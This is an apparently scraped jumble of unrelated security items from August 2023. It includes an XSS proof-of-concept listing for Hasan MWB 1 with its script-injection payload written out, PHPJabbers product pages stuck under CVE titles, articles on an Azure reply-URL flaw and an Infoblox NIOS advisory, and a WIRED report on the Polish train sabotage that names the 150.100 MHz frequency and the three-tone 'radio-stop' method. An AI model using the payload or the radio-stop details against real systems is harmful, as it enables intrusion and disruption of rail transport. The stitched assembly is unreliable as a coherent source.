Hasan MWB version 1 suffers from a cross site scripting vulnerability.

**Hasan MWB 1 Cross Site Scripting**

Posted Aug 28, 2023

Authored by indoushka

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4a53646feef7ce0d66491bbe2483dcbe70097fdb2aef17667fd6e5a2c356c92e

Download | Favorite | View

**Hasan MWB 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Hasan MWB v1 - XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               || # Vendor    : http://sourceforge.net/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /?q=1</title><ScRiPt >prompt(/indoushka/)</ScRiPt>[+] go to http://127.0.0.1/hasanmwbsourceforgenet/?q=1%3C/title%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,016)
*   Arbitrary (16,216)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,456)
*   Encryption (2,370)
*   Exploit (51,984)
*   File Inclusion (4,224)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,786)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,811)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,392)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,967)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,514)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,754)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,838)
*   UNIX (9,293)
*   UnixWare (186)
*   Windows (6,575)
*   Other

Hasan MWB 1 Cross Site Scripting

By Habiba Rashid
Critical Vulnerability in Microsoft Power Platform Discovered and Reported by Secureworks Researchers.
This is a post from HackRead.com Read the original post: Reply URL Flaw Allowed Unauthorized MS Power Platform API Access

Microsoft promptly removed the compromised, abandoned reply URL from the Azure AD application, effectively closing the avenue for unauthorized access.

**Key Findings**

*   **A critical vulnerability was found in Microsoft’s Power Platform API.**

*   **The vulnerability involved an abandoned reply URL within the Azure Active Directory (AD) environment.**

*   **The vulnerability could allow threat actors to gain unauthorized access to elevated permissions and control within an organization.**

*   **Microsoft responded swiftly to the vulnerability report and removed the compromised abandoned reply URL within 24 hours.**

*   **Organizations are urged to monitor their Azure AD applications for abandoned reply URLs to prevent similar attack scenarios.**

Cybersecurity experts from Secureworks have revealed a critical vulnerability within Microsoft’s Power Platform, now known as Entra ID. The vulnerability, discovered early this year, involved an abandoned reply URL within the Azure Active Directory (AD) environment, granting unauthorized access to elevated permissions and control within an organization.

The abandoned reply URL was associated with an Azure AD application connected to Microsoft’s Power Platform, a popular low-code platform. Exploiting this vulnerability allowed threat actors to redirect authorization codes to themselves, thereby exchanging these codes for access tokens. By doing so, attackers could gain entry into the Power Platform API through a middle-tier service and attain elevated privileges, potentially leading to unauthorized access and misuse.

Secureworks researchers emphasized the significance of the Power Platform API, which provides users with the ability to manage environments, adjust environment settings, and analyze capacity consumption. Due to the extensive permissions associated with this API, it becomes an appealing target for malicious actors aiming to gain privileged access.

Through a proof of concept, Secureworks demonstrated how this vulnerability could lead to the elevation of privileges within the Power Platform API. While the researchers did not exploit this access further, they highlighted the potential for attackers with knowledge of the Power Platform admin API to develop additional attack scenarios. The vulnerability allowed Secureworks researchers to gain administrative privileges within the Power Platform API through the manipulation of tokens.

In response to the vulnerability report, Microsoft swiftly addressed the issue within 24 hours of notification from Secureworks. The tech giant promptly removed the compromised abandoned reply URL from the Azure AD application, effectively closing the avenue for unauthorized access.

Secureworks emphasized the importance of organizations monitoring their Azure AD applications for abandoned reply URLs to prevent similar attack scenarios. The vulnerability, though resolved, warns of the potential risks associated with improper management of application URLs within Azure AD environments. 

1.  Mirai botnet exploiting Azure OMIGOD vulnerabilities
2.  Microsoft Azure customer hit by 2.4 Tbps DDoS attack
3.  Microsoft warns of Azure vulnerability prompting data theft
4.  Researchers accessed keys of Azure’s Cosmos DB customers
5.  Sensitive source codes exposed in Microsoft Azure Blob account leak

Reply URL Flaw Allowed Unauthorized MS Power Platform API Access

There is a Cross Site Scripting (XSS) vulnerability in the "action" parameter of index.php in PHPJabbers Make an Offer Widget v1.0.

Let clients suggest prices for your products and services using a simple make-an-offer button.

Version: 1.0

Embed a discrete make-an-offer app into your website and collect your clients' feedback on your pricing. You can either predefine three price options or give users the chance to propose their own price. Review the average offered price for each product or service and use it to adjust your pricing policy accordingly. Depending on the kind of offers made by your clients, you can choose to automatically ask for their email to start sending them your newsletter, or give them a promo code for the specific product, or just thank them.

**Make An Offer Widget**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Give your customers the chance to negotiate prices and win promo codes for the products and services they suggest prices for. The Make An Offer Widget is a simple call-to-action app that will bring life to your website and help you adjust your pricing policy.

Price Suggestions

With the Make An Offer Widget, you can give your website visitors three price options to choose from or let them propose any price.

Diverse Color Themes

10 color themes are available for each make-an-offer button so that you can easily adapt them to your website design and branding.

Unlimited Offer Widgets

Create separate offer widgets for each product or service. There is no limit on the number of make-an-offer buttons you can create.

Email & SMS Notifications

Create autoresponder messages that will be sent via email or SMS to administrators when a new offer is received.

Three Price Scenarios

Each offer option (both fixed price and price percentage) can lead to a different action: send an email, promo code, or thank-you email.

Expand Your Client Database

Using the make-an-offer app and the emails it collects from your clients you can enrich your customer database.

Review Offers & Emails

See a list of all offers received and check visitors' IP addresses and emails, if available. Filter offers by type using quick tabs.

PHP Source Code Customization

Buy a Developer License and make custom changes to the source code. Or request us to modify the make-an-offer app for you.

SPECIAL OFFER

**Make An Offer Widget for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Make An Offer Widget and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Make An Offer Widget**

**Key Benefits**

Installation Support

Key Features

Customizations

Remote Hosting

High Performance

**Pricing**

You can buy the Make An Offer Widget both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with the Make An Offer Widget and how the script has improved their online business.

“

PHPjabbers offers incredible PHP scripts that not only look good but are also enjoyable to set up and use. But what keeps me coming back to buy their latest scripts is the unbeatable customer service that you can't find anywhere else.

Andrew Jensen

“

Thank you, you guys are great. I am really impressed with your patience with me, as I am not an expert with codes and the way you come through for me. I am in services myself and I will like to thank you for an excellent service and support. I would recommend your products and your company to all my associates. Excellent service and support.  
Thank you again!

marios constantinou

“

I use Freeway (software) for web design, and learned of PHPJabbers on one of their forums where they received applause as offering easy to implement and well-supported PHP scripts. I totally agree.

Robert Hicks

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Make An Offer Widget.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**STIVA Shopping Cart**

$49 / $89

**Callback Widget**

$19 / $29

**PHP Review Script**

$39 / $79

**PHP Poll Script**

$19 / $29

**Document Creator**

$19 / $39

**PHP Comment Script**

$19 / $39

CVE-2023-40752: Make An Offer Widget | PHPJabbers

User enumeration is found in PHP Jabbers Hotel Booking System v4.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.

A mobile-friendly hotel reservation system that blends perfectly into any site!

Version: 4.0

The online hotel reservation system is built in PHP and uses MySQL to store data. The script provides a powerful room booking and reservation management functionality and allows you to install a clear call-to-action tool on your hotel website which will impact conversions and increase bookings. Our room booking system is highly customizable and compatible with various website types.

**Hotel Booking System**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Add a smart hotel reservation system on your hospitality website and make online bookings and payments possible! View below the key features that come standard with our PHP hotel booking script and contact us, if you need any customization.

Accept Bookings Online

A complete room booking system to provide hotel managers with an easy way to manage reservations and booking availability.

Mobile-Friendly Design

The front end of the hotel reservation system adapts to any screen resolution and device (PC, Mac, tablets, Android and iOS smartphones, etc.).

Editable Booking Form

Define which customer details the front-end system will require from customers using simple drop-down menus for each booking form field.

Multiple Languages

Translate the hotel reservation system into any language. Add a language tab on the booking form so clients can make their choice.

Payment Processing

Select and enable the payment methods that match your business best – PayPal, Authorize.net, credit card payments, wire transfers, etc.

Free Installation Support

Free installation support is provided for the hotel booking script. Just contact us if you have any difficulties installing the script.

Promos & Vouchers

Manage special offers – launch fixed or percentage discounts for different periods, add holiday packages and free-night promotions.

PHP Source Code Customization

Buy the script with the Developer License and make your own changes! We can customize it for you, too – see licensing options

SPECIAL OFFER

**Hotel Booking System for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Hotel Booking System script and test out the whole functionality. If you have any questions or need technical advice, go ahead and contact us.

**Hotel Booking System**

**Key Benefits**

Payment Gateways

High Performance

Extended Licence

Key Features

Installation Support

**Pricing**

You can buy the Hotel Booking System both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our room booking system and how the script has improved their online business!

“

I have used PHPJabbers in conjunction with my web designer to write a hotel reservation script for our online bookings. I have found the various staff members who have assisted me to be professional, prompt, thorough, and accommodating. Based on my experiences of their work, I would highly recommend their skills and services to anyone in need of the work they do.

Maura Lyons

“

I have used a number of third party scripts over the years as it saves weeks of development time. The problem with third party scripts is that if you want to make changes to it, it can be hard to work out how it is set up. I can say without question this is the best supported PHP script I have used. The PHPJabbers support team team not only custom built my requirements for an incredibly cheap price, they adapted their PHP hotel booking script to work exactly as we required at no extra cost. These people really do make sure you are happy. Very pleased. Thanks again.

Marcus Cox

“

This is by far the best support I ever got from any company. Thanks for your quick reply. I now finished implementation and move to testing your hotel reservation system. So far it meets my expectations.

Aylon Spigel

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Hotel Booking System.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Restaurant Booking System**

$79 / $129

**Vacation Rental Script**

$49 / $89

**Travel Tours Script**

$49 / $89

**Rental Property Booking Calendar**

$39 / $79

**Availability Booking Calendar**

$39 / $69

**Cleaning Business Software**

$69 / $129

CVE-2023-40760: Hotel Booking System | Online Hotel Reservation System

User enumeration is found in in PHPJabbers Make an Offer Widget v1.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.

Let clients suggest prices for your products and services using a simple make-an-offer button.

Version: 1.0

Embed a discrete make-an-offer app into your website and collect your clients' feedback on your pricing. You can either predefine three price options or give users the chance to propose their own price. Review the average offered price for each product or service and use it to adjust your pricing policy accordingly. Depending on the kind of offers made by your clients, you can choose to automatically ask for their email to start sending them your newsletter, or give them a promo code for the specific product, or just thank them.

**Make An Offer Widget**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Give your customers the chance to negotiate prices and win promo codes for the products and services they suggest prices for. The Make An Offer Widget is a simple call-to-action app that will bring life to your website and help you adjust your pricing policy.

Price Suggestions

With the Make An Offer Widget, you can give your website visitors three price options to choose from or let them propose any price.

Diverse Color Themes

10 color themes are available for each make-an-offer button so that you can easily adapt them to your website design and branding.

Unlimited Offer Widgets

Create separate offer widgets for each product or service. There is no limit on the number of make-an-offer buttons you can create.

Email & SMS Notifications

Create autoresponder messages that will be sent via email or SMS to administrators when a new offer is received.

Three Price Scenarios

Each offer option (both fixed price and price percentage) can lead to a different action: send an email, promo code, or thank-you email.

Expand Your Client Database

Using the make-an-offer app and the emails it collects from your clients you can enrich your customer database.

Review Offers & Emails

See a list of all offers received and check visitors' IP addresses and emails, if available. Filter offers by type using quick tabs.

PHP Source Code Customization

Buy a Developer License and make custom changes to the source code. Or request us to modify the make-an-offer app for you.

SPECIAL OFFER

**Make An Offer Widget for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Make An Offer Widget and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Make An Offer Widget**

**Key Benefits**

Extended Licence

Script Modifications

Installation Support

Key Features

Customizations

**Pricing**

You can buy the Make An Offer Widget both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with the Make An Offer Widget and how the script has improved their online business.

“

PHPjabbers offers incredible PHP scripts that not only look good but are also enjoyable to set up and use. But what keeps me coming back to buy their latest scripts is the unbeatable customer service that you can't find anywhere else.

Andrew Jensen

“

Thank you, you guys are great. I am really impressed with your patience with me, as I am not an expert with codes and the way you come through for me. I am in services myself and I will like to thank you for an excellent service and support. I would recommend your products and your company to all my associates. Excellent service and support.  
Thank you again!

marios constantinou

“

I use Freeway (software) for web design, and learned of PHPJabbers on one of their forums where they received applause as offering easy to implement and well-supported PHP scripts. I totally agree.

Robert Hicks

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Make An Offer Widget.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**STIVA Shopping Cart**

$49 / $89

**Callback Widget**

$19 / $29

**PHP Review Script**

$39 / $79

**PHP Poll Script**

$19 / $29

**Document Creator**

$19 / $39

**PHP Comment Script**

$19 / $39

CVE-2023-40767: Make An Offer Widget | PHPJabbers

Categories: News
Tags: week

Tags:  security

Tags:  august

Tags:  2023

Tags:  trusted advisor

Tags:  cyrus

Tags:  

A list of topics we covered in the week of August 21 to August 27 of 2023



(Read more...)




The post A week in security (August 21 - August 27) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Rootkit Scanner

Trojan Scanner

Virus Scanner

Spyware Scanner  

Password Generator

Anti Ransomware Protection

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (August 21 - August 27)

The sabotage of more than 20 trains in Poland by apparent supporters of Russia was carried out with a simple “radio-stop” command anyone could broadcast with $30 in equipment.

Since war first broke out between Ukraine and Russia in 2014, Russian hackers have at times used some of the most sophisticated hacking techniques ever seen in the wild to destroy Ukrainian networks, disrupt the country's satellite communications, and even trigger blackouts for hundreds of thousands of Ukrainian citizens. But the mysterious saboteurs who have, over the last two days, disrupted Poland's railway system—a major piece of transit infrastructure for NATO's support of Ukraine—appear to have used a far less impressive form of technical mischief: Spoof a simple radio command to the trains that triggers their emergency stop function.

On Friday and Saturday, more than 20 of Poland's trains carrying both freight and passengers were brought to a halt across the country through what Polish media and the BBC have described as a “cyberattack.” Polish intelligence services are investigating the sabotage incidents, which appear to have been carried out in support of Russia. The saboteurs reportedly interspersed the commands they used to stop the trains with the Russian national anthem and parts of a speech by Russian president Vladimir Putin.

Poland's railway system, after all, has served as a key source of Western weapons and other aid flowing into Ukraine as NATO attempts to bolster the country's defense against Russia's invasion. “We know that for some months there have been attempts to destabilize the Polish state,” Stanislaw Zaryn, a senior security official, told the Polish Press Agency. “For the moment, we are ruling nothing out.”

But as disruptive as the railway sabotage has been, on closer inspection, the “cyberattack” doesn't seem to have involved any “cyber” at all, according to Lukasz Olejnik, a Polish-speaking independent cybersecurity researcher and consultant and author of the forthcoming book _Philosophy of Cybersecurity_. In fact, the saboteurs appear to have sent simple so-called “radio-stop” commands via radio frequency to the trains they targeted. Because the trains use a radio system that lacks encryption or authentication for those commands, Olejnik says, anyone with as little as $30 of off-the-shelf radio equipment can broadcast the command to a Polish train—sending a series of three acoustic tones at a 150.100 megahertz frequency—and trigger their emergency stop function.

“It is three tonal messages sent consecutively. Once the radio equipment receives it, the locomotive goes to a halt,” Olejnik says, pointing to a document outlining trains' different technical standards in the European Union that describes the “radio-stop” command used in the Polish system. In fact, Olejnik says that the ability to send the command has been described in Polish radio and train forums and on YouTube for years. “Everybody could do this. Even teenagers trolling. The frequencies are known. The tones are known. The equipment is cheap.”

Poland's national transportation agency has stated its intention to upgrade Poland's railway systems by 2025 to use almost exclusively GSM cellular radios, which do have encryption and authentication. But until then, it will continue to use the relatively unprotected VHF 150 MHz system that allows the “radio-stop” commands to be spoofed.

The only real limitation of the train-paralyzing radio attack, Olejnik says, would be that the saboteurs would have to be relatively close to the target trains—somewhere from hundreds of feet to miles, depending on the power of the radio equipment used in their disruption operation. (Olejnik was careful to note that he hasn't tested the attack himself.) Given that the disruptions appear to have occurred in three different Polish administrative regions across the country, getting that equipment close enough to all the target trains would likely have been the biggest challenge for the saboteurs. “It is really a cheap operation,” Olejnik says. “The biggest risk is the need of being in proximity.”

Polish State Railways didn't immediately respond to WIRED's request for comment. But a statement from the railways agency notes that the train disruptions were due to “unauthorized broadcasting of the radio-stop signal” sent “by means of a radiotelephone by an unknown perpetrator.” The statement adds that “receiving a radio-stop signal results in an immediate stop of all trains whose radios operate on a given frequency.”

Despite those automated emergency stops, the railway agency wrote that “there is no threat to rail passengers. The result of this event is only difficulties in the running of trains.” The Polish Press Agency reported no injuries or damage as a result of the radio sabotage operation.

If Russia or its supporters have in fact sabotaged the railway system of Ukraine's ally, the operation wouldn't be without precedent. In fact, Belarusian dissident hackers known as the Cyber Partisans protested Belarus's support of the Russian military by launching their own rare political ransomware attack against Belarus's Railways' IT network in January of 2022, in an attempt to prevent Belarus's participation in the invasion that came just a month later.

This disruption of Poland's rail system doesn't appear to have required any such ransomware or even a penetration of a digital network. But Olejnik cautions that the simplicity of the attack shouldn't lead anyone to underestimate its effects, which may continue to play out given the difficulty of preventing the radio attack on Polish trains' unauthenticated communication systems.

“When you’re a hub of support to war-stricken Ukraine, you’re indeed a target,” says Olejnik. “Low-hanging fruits are always the best approach.”

_Additional reporting by Lily Hay Newman._

The Cheap Radio Hack That Disrupted Poland's Railway System

Infoblox NIOS through 8.5.1 has a faulty component that accepts malicious input without sanitization, resulting in shell access.

August 2, 2023 • Knowledge

**Overview and Impact:**

Currently supported Infoblox NIOS versions through 8.5.2 have a faulty component that accepts malicious input without sanitization, resulting in shell access. The absence of proper validation on an input field allowed for the exploitation of a remote code execution (RCE) vulnerability. The malicious actor needs access to an authenticated feature in the NIOS UI to be able to execute the malicious input to gain access to the shell.  
 

**Affected Versions:**

NIOS 8.5.2 and prior

**Resolution:**

The fix for this issue was included in 8.5.3 and later releases of NIOS. A hotfix identified as NIOS-93969 is available for NIOS 8.5.2 and is attached to this article. Additionally this issue was resolved in the hotfix for CVE-2023-2828.

The vulnerability was identified thanks to the efforts of Sean Morland of NCC Group.

CVE-2023-37249: NIOS is vulnerable to CVE-2023-37249

By Owais Sultan
Okay, digital explorers! Strap yourselves in as we prepare to embark on a thrilling expedition through the complex and ever-shifting digital wilderness.
This is a post from HackRead.com Read the original post: Defending the Virtual Kingdom: Exploring Modern Cybersecurity Landscapes

In this realm of ones and zeros, a captivating dance of technology and tactics unfolds, revealing a modern battlefield where the stakes are high and the adversaries are often invisible. Let’s delve into the intricate world of modern cybersecurity – a vital invisible shield that tirelessly defends our precious virtual dominion.

**Chapter 1: Decoding the Shifting Threatscape**

Imagine a virtual Wild West, where the nefarious characters aren’t just the black-hat hackers but a diverse cast of digital personas. Picture ransomware renegades as modern-day bandits, taking your data hostage and demanding a hefty digital bounty (ransom) for its release. These outlaws hold your crucial files at virtual gunpoint, paralyzing organizations and individuals alike. 

Meanwhile, the cunning phishing outlaws employ a different weapon: psychology. Through a careful masquerade, they impersonate trusted entities to deceive unsuspecting victims into revealing sensitive information. All of this makes advanced preemptive measures like cloud penetration testing all the more important. 

**The new cybercriminals**

Think of them as modern-day con artists, using technology to manipulate human nature itself. Don’t forget the elite APT bandits, the cyber equivalent of skilled ninjas. They execute stealthy, long-term attacks, infiltrating high-value targets with precision and quietly exfiltrating valuable data, leaving little trace. 

And then, there are the enigmatic zero-day gunslingers. With exploits that target undiscovered vulnerabilities in software, they wield powerful weapons that are as elusive as they are dangerous. To navigate this perilous digital realm, fluency in this diverse cast of threats isn’t just helpful – it’s an imperative survival skill.

**Chapter 2: The Great Game of Digital Nations**

The geopolitical landscape is no longer confined to conventional borders and physical territories. Nation-states have unshackled themselves from traditional realms and entered the domain of digital warfare.

Stuxnet, a digital weapon that crippled Iran’s nuclear program, was a harbinger of this transformation. It marked the debut of a new era where nations conduct covert operations and pursue strategic goals through cyber means. These digital campaigns aren’t limited to espionage or data theft; they now encompass economic disruption and even sabotage.

Nation-states have become adept at deploying cyberweapons, infiltrating critical infrastructure, and manipulating global narratives. In this complex game of digital chess, your personal data and digital interactions might unwittingly play a pivotal role.

You’re no longer just a bystander in this grand theatre; you’re a potential player, whether you choose to be or not. As nation-states engage in this high-stakes digital chess match, understanding the rules and anticipating their moves is vital for the safety of individuals, organizations, and entire nations.

**Chapter 3: Fortifying the Digital Stronghold**

Now that we’ve ventured into the heart of this digital landscape, it’s time to gear up for defence. Imagine firewalls as the towering walls of a medieval castle, standing guard at the entrance of your digital domain.

These digital barriers scrutinize incoming and outgoing data, allowing the safe passage of legitimate traffic while fending off malicious invaders. Intrusion detection systems act as vigilant sentinels equipped with the ability to identify abnormal patterns or behaviours that may indicate a breach. They raise the alarm, summoning the cyber garrison to repel any imminent threat. But these fortifications only form the outer layer of your defence strategy.

Encryption, your ultimate cryptographic shield, takes centre stage when safeguarding sensitive information. Just as a vault secures your valuables, encryption transforms your data into an unreadable cypher, accessible only to those with the key. By combining these technological bastions, you’re building a formidable stronghold against the relentless tide of cyber threats.

As we traverse the digital landscape, we encounter not just lines of code, but the intricate dance of human psychology. Enter the art of social engineering, where hackers leverage the vulnerabilities of the human mind to breach digital defences.

**Pretexting**, the act of creating a plausible pretext to extract information, is akin to an actor donning multiple personas to deceive you. Baiting, on the other hand, exploits curiosity or desire. Hackers dangle tantalizing offers like digital bait, luring you into traps that compromise your security.

**Tailgating** capitalizes on trust – an unauthorized entity gains access by simply following you through a secured entrance, just as a person might slip through a closing door after someone else. With social engineering, the adversary isn’t just the code; it’s the understanding of human behaviour that’s their potent weapon. Arm yourself with awareness, scepticism, and a dash of digital paranoia to outsmart these psychological manoeuvres.

**Chapter 5: The AI Enigma: Cybersecurity’s Double-Edged Sword**

The dawn of Artificial Intelligence (AI) brings both promise and peril to the realm of cybersecurity.

Picture AI as a digital ally, a vigilant sentinel that spots unusual patterns in the vast sea of data, sounding the alarm when something’s amiss. It’s like a digital bloodhound that sniffs out anomalies, flagging potential threats before they materialize.

But beware, for AI is a double-edged sword. Hackers can wield it too, employing AI to automate attacks, craft sophisticated phishing emails, or even mimic your behaviour to evade detection. Imagine a foe that learns from its mistakes, adapts to your defences, and evolves in real time. In the ongoing battle between offence and defence, AI introduces an element of unpredictability, making this digital frontier an ever more challenging battleground.

**Chapter 6: Cybersecurity Unity: Strength in Numbers**

In this virtual landscape, unity is your secret weapon. Cyber threats transcend borders, and adversaries are bound by neither time nor geography. It’s a call for global cooperation – an alliance that extends beyond political affiliations or economic interests.

International collaboration becomes a formidable force, pooling resources, intelligence, and expertise to counteract the relentless tide of cyber threats. Initiatives for information sharing, response coordination, and the establishment of digital norms become paramount.

It’s not just about individual cybersecurity; it’s about safeguarding the interconnected tapestry of our digital world.

**Conclusion: Rise of the Cyber Guardians**

As we conclude our expedition, one truth becomes apparent: cybersecurity isn’t an endgame; it’s an ongoing quest. In this realm, vigilance is your guiding star, and knowledge is your greatest weapon.

This is a journey where each individual, organization, and nation stands as a potential guardian of the digital realm. The ever-shifting landscape demands adaptability, resilience, and continuous learning.

Remember, the equilibrium between chaos and order rests on your shoulders. So, fellow adventurers, embrace the challenge, rise to the occasion, and navigate this cyber frontier with unwavering determination. Stay curious, stay secure, and in the face of the digital tempest, become the guardians that protect and shape our interconnected world.

Defending the Virtual Kingdom: Exploring Modern Cybersecurity Landscapes

By Owais Sultan
